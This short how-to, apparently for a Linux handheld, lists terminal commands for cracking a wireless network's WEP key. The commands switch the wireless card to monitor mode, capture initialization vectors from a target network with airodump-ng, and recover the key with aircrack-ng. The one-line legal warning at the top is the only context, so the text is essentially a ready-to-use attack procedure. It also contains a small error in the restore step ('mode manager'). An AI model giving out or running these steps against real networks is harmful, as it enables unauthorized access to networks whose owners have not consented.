Remember that stealing the keys of a wireless network
without the knowledge of the network owner is a criminal
offense!
Type in X terminal:
- sudo gainroot
- ifconfig wlan0 down
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- airodump-ng wlan0
- airodump-ng –channel X –bssid Y -w wepkey –ivs wlan0
- aircrack-ng wepkey*.ivs
To return type in X terminal:
- ifconfig wlan0 down
- iwconfig wlan0 mode manager
- ifconfig wlan0 up
